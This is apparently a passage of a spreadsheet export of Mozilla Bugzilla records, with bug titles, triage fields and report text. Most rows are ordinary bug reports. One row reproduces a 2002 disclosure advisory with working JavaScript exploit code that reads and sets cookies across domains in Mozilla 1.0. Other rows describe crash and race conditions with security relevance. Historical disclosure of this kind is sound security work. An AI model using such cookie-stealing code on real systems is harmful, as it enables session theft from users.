        </is>
      </c>
      <c r="O3465" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3465" t="inlineStr"/>
      <c r="Q3465" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3465" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3465" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3465" t="n">
        <v>1</v>
      </c>
      <c r="U3465" t="n">
        <v>0</v>
      </c>
      <c r="V3465" t="n">
        <v>9</v>
      </c>
      <c r="W3465" t="inlineStr">
        <is>
          <t>I am only seeing this on stage, production seems to be working fine.
raceback (most recent call last):
File "/data/www/treeherder.allizom.org/treeherder-service/treeherder/webapp/api/resultset.py", line 384, in create
jm.store_result_set_data(request.DATA)
File "/data/www/treeherder.allizom.org/treeherder-service/treeherder/model/derived/jobs.py", line 2749, in store_result_set_data
inserted_result_set_ids, 'result_set')
File "/data/www/treeherder.allizom.org/treeherder-service/treeherder/model/derived/base.py", line 109, in submit_publish_to_pulse_tasks
from treeherder.model.tasks import publish_to_pulse
File "/data/www/treeherder.allizom.org/treeherder-service/treeherder/model/tasks.py", line 81, in &lt;module&gt;
schemas = schemas
File "/data/www/treeherder.allizom.org/treeherder-service/treeherder/model/pulse_publisher.py", line 167, in __init__
auto_declare = True
File "/usr/lib/python2.6/site-packages/kombu/messaging.py", line 85, in __init__
self.revive(self._channel)
File "/usr/lib/python2.6/site-packages/kombu/messaging.py", line 218, in revive
self.declare()
File "/usr/lib/python2.6/site-packages/kombu/messaging.py", line 105, in declare
self.exchange.declare()
File "/usr/lib/python2.6/site-packages/kombu/entity.py", line 163, in declare
return self.channel.exchange_declare(
File "/usr/lib/python2.6/site-packages/kombu/abstract.py", line 115, in channel
channel = self._channel = channel()
File "/usr/lib/python2.6/site-packages/kombu/utils/__init__.py", line 422, in __call__
value = self.__value__ = self.__contract__()
File "/usr/lib/python2.6/site-packages/kombu/messaging.py", line 205, in &lt;lambda&gt;
channel = ChannelPromise(lambda: connection.default_channel)
File "/usr/lib/python2.6/site-packages/kombu/connection.py", line 756, in default_channel
self.connection
File "/usr/lib/python2.6/site-packages/kombu/connection.py", line 741, in connection
self._connection = self._establish_connection()
File "/usr/lib/python2.6/site-packages/kombu/connection.py", line 696, in _establish_connection
conn = self.transport.establish_connection()
File "/usr/lib/python2.6/site-packages/kombu/transport/pyamqp.py", line 112, in establish_connection
conn = self.Connection(**opts)
File "/usr/lib/python2.6/site-packages/amqp/connection.py", line 165, in __init__
self.transport = self.Transport(host, connect_timeout, ssl)
File "/usr/lib/python2.6/site-packages/amqp/connection.py", line 186, in Transport
return create_transport(host, connect_timeout, ssl)
File "/usr/lib/python2.6/site-packages/amqp/transport.py", line 297, in create_transport
return SSLTransport(host, connect_timeout, ssl)
File "/usr/lib/python2.6/site-packages/amqp/transport.py", line 199, in __init__
super(SSLTransport, self).__init__(host, connect_timeout)
File "/usr/lib/python2.6/site-packages/amqp/transport.py", line 95, in __init__
raise socket.error(last_err)
error: timed out</t>
        </is>
      </c>
      <c r="X3465" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3466">
      <c r="A3466" t="n">
        <v>928187</v>
      </c>
      <c r="B3466" t="inlineStr">
        <is>
          <t>2013-10-17 17:04:14 -0700</t>
        </is>
      </c>
      <c r="C3466" t="inlineStr">
        <is>
          <t>&lt;iframe src&gt; fragment timing attack can reveal private data</t>
        </is>
      </c>
      <c r="D3466" t="inlineStr">
        <is>
          <t>2017-02-09 07:55:50 -0800</t>
        </is>
      </c>
      <c r="E3466" t="n">
        <v>1</v>
      </c>
      <c r="F3466" t="n">
        <v>1</v>
      </c>
      <c r="G3466" t="n">
        <v>3</v>
      </c>
      <c r="H3466" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3466" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3466" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3466" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3466" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3466" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3466" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3466" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3466" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main49+]</t>
        </is>
      </c>
      <c r="Q3466" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3466" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3466" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3466" t="n">
        <v>1</v>
      </c>
      <c r="U3466" t="n">
        <v>0</v>
      </c>
      <c r="V3466" t="n">
        <v>24</v>
      </c>
      <c r="W3466" t="inlineStr">
        <is>
          <t>See bug 881087.</t>
        </is>
      </c>
      <c r="X3466" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3467">
      <c r="A3467" t="n">
        <v>950604</v>
      </c>
      <c r="B3467" t="inlineStr">
        <is>
          <t>2013-12-16 01:25:27 -0800</t>
        </is>
      </c>
      <c r="C3467" t="inlineStr">
        <is>
          <t>Firefox reproducibly crashes when using asm.js code in workers and transferable objects</t>
        </is>
      </c>
      <c r="D3467" t="inlineStr">
        <is>
          <t>2015-02-25 20:46:59 -0800</t>
        </is>
      </c>
      <c r="E3467" t="n">
        <v>1</v>
      </c>
      <c r="F3467" t="n">
        <v>1</v>
      </c>
      <c r="G3467" t="n">
        <v>3</v>
      </c>
      <c r="H3467" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3467" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3467" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3467" t="inlineStr">
        <is>
          <t>26 Branch</t>
        </is>
      </c>
      <c r="L3467" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3467" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3467" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3467" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3467" t="inlineStr">
        <is>
          <t>[adv-main27+][adv-esr24.4+] appears fixed by bug 861925</t>
        </is>
      </c>
      <c r="Q3467" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3467" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3467" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T3467" t="n">
        <v>1</v>
      </c>
      <c r="U3467" t="n">
        <v>0</v>
      </c>
      <c r="V3467" t="n">
        <v>30</v>
      </c>
      <c r="W3467" t="inlineStr">
        <is>
          <t>Created attachment 8347946
Test case to reproduce the issue.
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.55 Safari/537.36
Steps to reproduce:
I encountered a reproducible crash bug happening as a result of terminating a worker which passed an ArrayBuffer to the main thread as transferable object. The issue only occurs when the worker ran (Emscripten-generated) asm.js code. The precise steps taken are as follows (test case is attached):
(1) Compile an arbitrary C program into JS, making sure it generates asm.js-compliant code.
(2) Patch the generated JS code to make the internal emscripten HEAP (a large typed array) available to external JS functions
(3) Run the patched, generated JS code in a Web worker and pass the exposed HEAP array to the main UI thread (by using self.postMessage) as a "transferable object".
(4) Upon receiving the transferable object in the main thread, kill the worker by calling its terminate() function.
Please notice that when one of the preconditions (i.e., asm.js code working on top of the HEAP array, passing it to the main thread as transferable, killing the worker) is not met, Firefox does not crash. I only encountered the issue in conjunction with all three conditions.
Actual results:
Firefox crashes (other browsers like Chrome happily go along). 
I suspect a double freeing of the transferred ArrayBuffer when the worker is terminated. 
Expected results:
Firefox shouldn't crash, the worker should be terminated, the previously "transferred" array should continue to be accessible in the main thread.</t>
        </is>
      </c>
      <c r="X3467" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3468">
      <c r="A3468" t="n">
        <v>152725</v>
      </c>
      <c r="B3468" t="inlineStr">
        <is>
          <t>2002-06-18 17:49:21 -0700</t>
        </is>
      </c>
      <c r="C3468" t="inlineStr">
        <is>
          <t>Possible cookie stealing using javascript: URLs</t>
        </is>
      </c>
      <c r="D3468" t="inlineStr">
        <is>
          <t>2002-07-30 12:14:28 -0700</t>
        </is>
      </c>
      <c r="E3468" t="n">
        <v>1</v>
      </c>
      <c r="F3468" t="n">
        <v>1</v>
      </c>
      <c r="G3468" t="n">
        <v>3</v>
      </c>
      <c r="H3468" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3468" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3468" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K3468" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3468" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3468" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3468" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3468" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3468" t="inlineStr">
        <is>
          <t>[adt1 RTM] [ETA 07/13]</t>
        </is>
      </c>
      <c r="Q3468" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3468" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3468" t="inlineStr">
        <is>
          <t>mozilla1.0.1</t>
        </is>
      </c>
      <c r="T3468" t="n">
        <v>1</v>
      </c>
      <c r="U3468" t="n">
        <v>0</v>
      </c>
      <c r="V3468" t="n">
        <v>36</v>
      </c>
      <c r="W3468" t="inlineStr">
        <is>
          <t>---..---..---..---..---..---..---..---..---..---..---..---..----
Title:      Mozilla 1.0 XSS - Reading/setting arbitrary cookie
Date:       [2002-06-19]
Software:   Mozilla 1.0
Impact:     At least reading/setting arbitrary cookie
Vendor:     http://www.mozilla.org                 _     _
Workaround: Disable javascript                   o' \,=./ `o
Author:     Andreas Sandblad, sandblad@acc.umu.se   (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
DESCRIPTION:
============
Mozilla allows script in the javascript protocoll to set and read cookies.
The operating host and path is determined in similiar way as for http
urls, namely as "javascript:[host][path]". Cookie security is based only
on host and path. By carefully crafting a mallicious javascript link
opened in a new window, it is possible to access and alter cookies from
other domains.
EXPLOIT:
========
Setting a host not generating any javascript errors may seem difficult but
can easily be done using some tricks. It is done by fooling Mozilla into
thinking the host is a legal variable. Using the fact that dots in
javascript represents a way to access members in objects, we can create a
complete valid host not generating any javascript errors. Setting a legal
"/" path is done by understanding that "host/ 1" is ok as long as the host
variable is an integer. The number "1" will not be included in the path
because there is a space between "/" and "1".
NOTE: Exploit is designed for default settings in Mozilla and has been
tested on win32 (3 machines) and freeBSD (1 machine). On win32 the timer
can be set to 0, but on freeBSD it has to be set to something like 50 ms.
The timer is set to 2000 ms just in case.
-------------------------- CUT HERE ----------------------------
&lt;pre&gt;
Title:      Mozilla 1.0 XSS Exploit
Date:       [2002-06-19]                           _     _
Impact:     Reading/setting arbitrary cookie     o' \,=./ `o
Author:     Andreas Sandblad, sandblad@acc.umu.se   (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
&lt;/pre&gt;
&lt;a href="javascript:readCookie();"&gt;Read google cookie (must be
set)&lt;/a&gt;&lt;br&gt;
&lt;a href="javascript:setCookie();"&gt;Set www.mozilla.org cookie&lt;/a&gt;
&lt;script&gt;
function readCookie()
{
s = "javascript:function f(){com=1} google=new f();" +
    "location='javascript:google.com/1;" +
    "setTimeout(\"alert(document.cookie);close()\",2000);\"\"'";
    open(s);
}
function setCookie()
{
s = "javascript:function f(){org=1} function g(){mozilla=f} " +
    "www=new g();www.mozilla=new f();" +
    "location='javascript:www.mozilla.org/1;" +
    "setTimeout(\"document.cookie=\\'YOUARE=VULNERABLE;" +
    "path=/;expires=Fri, 13 Dec 2003 23:59:59 GMT;\\';" +
    "alert(\\'cookie set\\');close()\",2000);\"\"'";
    open(s);
}
&lt;/script&gt;
-------------------------- CUT HERE ----------------------------
Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.
Old advisories:
===============
#7 [2002-05-19] "IE dot bug"
http://online.securityfocus.com/archive/1/273168
#6 [2002-05-15] "Opera javascript protocoll vulnerability"
http://online.securityfocus.com/archive/1/272583
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561
CREDITS:
========
(for helping me testing the vulnerability)
Ingesson (freeBSD), Quitta (win32), Hawkan (win32)
Feedback:
=========
Please send suggestions and comments to:           _     _
sandblad@acc.umu.se                              o' \,=./ `o
                                                    (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad,
student in Engineering Physics at Umea University, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--</t>
        </is>
      </c>
      <c r="X3468" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3469">
      <c r="A3469" t="n">
        <v>692240</v>
      </c>
      <c r="B3469" t="inlineStr">
        <is>
          <t>2011-10-05 13:04:24 -0700</t>
        </is>
      </c>
      <c r="C3469" t="inlineStr">
        <is>
          <t>Downloading malloc.log &amp; sdleak.tree fails for the first debug build since the PGO changes</t>
        </is>
      </c>
      <c r="D3469" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3469" t="n">
        <v>1</v>
      </c>
      <c r="F3469" t="n">
        <v>1</v>
      </c>
      <c r="G3469" t="n">
        <v>5</v>
      </c>
      <c r="H3469" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3469" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3469" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3469" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3469" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3469" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3469" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3469" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3469" t="inlineStr"/>
      <c r="Q3469" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3469" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3469" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3469" t="n">
        <v>1</v>
      </c>
      <c r="U3469" t="n">
        <v>0</v>
      </c>
      <c r="V3469" t="n">
        <v>8</v>
      </c>
      <c r="W3469" t="inlineStr">
        <is>
          <t>I am not sure if this is a new problem that is going to stick and make the tree close or just a blip in the network. Filing as normal as I don't know yet how bad it can be.
Two build jobs [1][2] have just failed by not being able to download malloc.log.
When running the step manually in the slave we can download the file but when run through buildbot fails.
I have notice one thing and that is if I try stage.mozilla.org it works but if I try 10.2.74.116 [3] it fails. Not sure if this is misleading info but just in case it was relevant.
* it works: http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-linux64-debug//malloc.log
* it fails: http://10.2.74.116/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-linux64-debug//malloc.log
[1] https://tbpl.mozilla.org/php/getParsedLog.php?id=6688053&amp;tree=Mozilla-Inbound&amp;full=1
[2] https://tbpl.mozilla.org/php/getParsedLog.php?id=6688165&amp;tree=Mozilla-Inbound&amp;full=1
[3]
armenzg-laptop $ host stage.mozilla.org
stage.mozilla.org is an alias for surf.mozilla.org.
surf.mozilla.org has address 10.2.74.116
[actual error]
Calling &lt;function run_with_timeout at 0xb7f07064&gt; with args: (['wget', '-O', 'malloc.log.old', 'http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-linux-debug//malloc.log'], 1260, None, None, False, True), kwargs: {}, attempt #1
Executing: ['wget', '-O', 'malloc.log.old', 'http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-linux-debug//malloc.log']
Failed, sleeping 1 seconds before retrying
Calling &lt;function run_with_timeout at 0xb7f07064&gt; with args: (['wget', '-O', 'malloc.log.old', 'http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-linux-debug//malloc.log'], 1260, None, None, False, True), kwargs: {}, attempt #2
Executing: ['wget', '-O', 'malloc.log.old', 'http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-linux-debug//malloc.log']
Failed, sleeping 1 seconds before retrying
Calling &lt;function run_with_timeout at 0xb7f07064&gt; with args: (['wget', '-O', 'malloc.log.old', 'http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-linux-debug//malloc.log'], 1260, None, None, False, True), kwargs: {}, attempt #3
Executing: ['wget', '-O', 'malloc.log.old', 'http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-linux-debug//malloc.log']
Failed, sleeping 1 seconds before retrying
Calling &lt;function run_with_timeout at 0xb7f07064&gt; with args: (['wget', '-O', 'malloc.log.old', 'http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-linux-debug//malloc.log'], 1260, None, None, False, True), kwargs: {}, attempt #4
Executing: ['wget', '-O', 'malloc.log.old', 'http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-linux-debug//malloc.log']
Failed, sleeping 1 seconds before retrying
Calling &lt;function run_with_timeout at 0xb7f07064&gt; with args: (['wget', '-O', 'malloc.log.old', 'http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-linux-debug//malloc.log'], 1260, None, None, False, True), kwargs: {}, attempt #5
Executing: ['wget', '-O', 'malloc.log.old', 'http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-linux-debug//malloc.log']
Giving up on &lt;function run_with_timeout at 0xb7f07064&gt;
Unable to successfully run ['wget', '-O', 'malloc.log.old', 'http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-linux-debug//malloc.log'] after 5 attempts
Process stdio:
Process stderr:
--09:53:19--  http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-linux-debug//malloc.log
Resolving stage.mozilla.org... 10.2.74.116
Connecting to stage.mozilla.org|10.2.74.116|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
09:53:19 ERROR 404: Not Found.</t>
        </is>
      </c>
      <c r="X3469" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3470">
      <c r="A3470" t="n">
        <v>39868</v>
      </c>
      <c r="B3470" t="inlineStr">
        <is>
          <t>2000-05-19 11:24:54 -0700</t>
        </is>
      </c>
      <c r="C3470" t="inlineStr">
        <is>
          <t>Bookmarks never load in Apps sidebar</t>
        </is>
      </c>
      <c r="D3470" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E3470" t="n">
        <v>1</v>
      </c>
      <c r="F3470" t="n">
        <v>1</v>
      </c>
      <c r="G3470" t="n">
        <v>2</v>
      </c>
      <c r="H3470" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3470" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J3470" t="inlineStr">
        <is>
          <t>Sidebar</t>
        </is>
      </c>
      <c r="K3470" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3470" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3470" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3470" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3470" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3470" t="inlineStr">
        <is>
          <t>[nsbeta2+][dogfood-][rjc]</t>
        </is>
      </c>
      <c r="Q3470" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3470" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3470" t="inlineStr">
        <is>
          <t>M18</t>
        </is>
      </c>
      <c r="T3470" t="n">
        <v>1</v>
      </c>
      <c r="U3470" t="n">
        <v>0</v>
      </c>
      <c r="V3470" t="n">
        <v>23</v>
      </c>
      <c r="W3470" t="inlineStr">
        <is>
          <t>Using today's NS verification build 51908 on Linux
Open Mail window with sidebar that has active panel == bookmarks.
Get the spinning arrows, "Loading...", but they never load.
They load okay in the browser window.</t>
        </is>
      </c>
      <c r="X3470" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3471">
      <c r="A3471" t="n">
        <v>865883</v>
      </c>
      <c r="B3471" t="inlineStr">
        <is>
          <t>2013-04-25 15:29:02 -0700</t>
        </is>
      </c>
      <c r="C3471" t="inlineStr">
        <is>
          <t>IonMonkey: Assertion failure: Assertion failure: JSVAL_IS_DOUBLE_IMPL(l), at ./dist/include/js/Value.h:363</t>
        </is>
      </c>
      <c r="D3471" t="inlineStr">
        <is>
          <t>2014-11-19 19:48:11 -0800</t>
        </is>
      </c>
      <c r="E3471" t="n">
        <v>1</v>
      </c>
      <c r="F3471" t="n">
        <v>1</v>
      </c>
      <c r="G3471" t="n">
        <v>3</v>
      </c>
      <c r="H3471" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3471" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3471" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3471" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3471" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3471" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3471" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3471" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3471" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][adv-main22+]</t>
        </is>
      </c>
      <c r="Q3471" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3471" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3471" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T3471" t="n">
        <v>1</v>
      </c>
      <c r="U3471" t="n">
        <v>0</v>
      </c>
      <c r="V3471" t="n">
        <v>22</v>
      </c>
      <c r="W3471" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision 690b5e0f6562 (run with --ion-eager):
function AddTestCase( description, expect, actual ) {}
function computeSetByRow(x, y) {
  var Cr = (x - 256) / scale + 0.407476;
  var Ci = false &lt;= propertyIsEnumerable;
  var I = 0, R = 0, I2 = 0, R2 = 0;
  var n = 0;
  while ((R2+I2 &lt; 2.0) &amp;&amp; (n &lt; 512)) {
    I = (R+R)*I+Ci;
    R = AddTestCase -- -I2+Cr;
    R2 = R*R;
    I2 = I*I;
  }
}
var scale = 10000*300;
var rows = 4;
var cols = 4;
r = new ParallelArray([rows, cols], computeSetByRow);</t>
        </is>
      </c>
      <c r="X3471" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3472">
      <c r="A3472" t="n">
        <v>826588</v>
      </c>
      <c r="B3472" t="inlineStr">
        <is>
          <t>2013-01-03 19:44:40 -0800</t>
        </is>
      </c>
      <c r="C3472" t="inlineStr">
        <is>
          <t>Differential Testing: Getting different output on 64-bit Windows js shells involving lastIndex</t>
        </is>
      </c>
      <c r="D3472" t="inlineStr">
        <is>
          <t>2014-05-05 17:54:41 -0700</t>
        </is>
      </c>
      <c r="E3472" t="n">
        <v>1</v>
      </c>
      <c r="F3472" t="n">
        <v>1</v>
      </c>
      <c r="G3472" t="n">
        <v>3</v>
      </c>
      <c r="H3472" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3472" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3472" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3472" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3472" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3472" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3472" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3472" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3472" t="inlineStr">
        <is>
          <t>[fuzzblocker][adv-main21+] YARR bug on Win64</t>
        </is>
      </c>
      <c r="Q3472" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3472" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3472" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3472" t="n">
        <v>1</v>
      </c>
      <c r="U3472" t="n">
        <v>0</v>
      </c>
      <c r="V3472" t="n">
        <v>9</v>
      </c>
      <c r="W3472" t="inlineStr">
        <is>
          <t>r = RegExp("(){0}", "g")
r.test()
print(r.lastIndex)
prints a number that is different everytime, on js opt shell on m-c changeset ceef8a5c3ca1 without any CLI arguments. This only seems to happen on 64-bit builds.
Other platforms / OS'es or Win32 js shells seem to output 0 instead.
Jesse advises to set this s-s pending further investigation.
autoBisect is now running.</t>
        </is>
      </c>
      <c r="X3472" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3473">
      <c r="A3473" t="n">
        <v>748948</v>
      </c>
      <c r="B3473" t="inlineStr">
        <is>
          <t>2012-04-25 13:59:16 -0700</t>
        </is>
      </c>
      <c r="C3473" t="inlineStr">
        <is>
          <t>Possible race condition when launching updates from service after security checks</t>
        </is>
      </c>
      <c r="D3473" t="inlineStr">
        <is>
          <t>2012-06-21 09:06:04 -0700</t>
        </is>
      </c>
      <c r="E3473" t="n">
        <v>1</v>
      </c>
      <c r="F3473" t="n">
        <v>1</v>
      </c>
      <c r="G3473" t="n">
        <v>3</v>
      </c>
      <c r="H3473" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3473" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3473" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K3473" t="inlineStr">
        <is>
          <t>12 Branch</t>
        </is>
      </c>
      <c r="L3473" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3473" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3473" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3473" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3473" t="inlineStr">
        <is>
          <t>[qa-][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3473" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3473" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3473" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T3473" t="n">
        <v>1</v>
      </c>
      <c r="U3473" t="n">
        <v>0</v>
      </c>
      <c r="V3473" t="n">
        <v>44</v>
      </c>
      <c r="W3473" t="inlineStr">
        <is>
          <t>Created attachment 618423
Patch v1.
James Forshaw wrote:
&gt; If FF is installed to a non-standard directory does the updater service get 
&gt; installed to a secure directory elsewhere, or does it not get installed at 
&gt; all, or does it get installed along side?
And relating to the patch attached to this post:
&gt; That fix for the race is not quite correct, for at least two reasons. 
&gt; 1) The attacker need not provide a path to a file system which honors the
&gt;  write locking. For example if he pointed it to a UNC path then he could
&gt;  change it on the remote server and Windows *could* return the new data at 
&gt; LoadLibrary time.
&gt; 
&gt; 2) The semantics of LoadLibrary differ from CreateFile when it comes to 
&gt; paths. For example there is no checking done to make the path absolute so 
&gt; if you provide a relative path then LoadLibrary "could" search the path 
&gt; first (an unlikely condition). But probably more importantly, if you supply 
&gt; a filename with no extension then LoadLibrary always appends .DLL to the 
&gt; filename before loading, CreateFile will open the name as is.</t>
        </is>
      </c>
      <c r="X3473" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3474">
      <c r="A3474" t="n">
        <v>1523249</v>
      </c>
      <c r="B3474" t="inlineStr">
        <is>
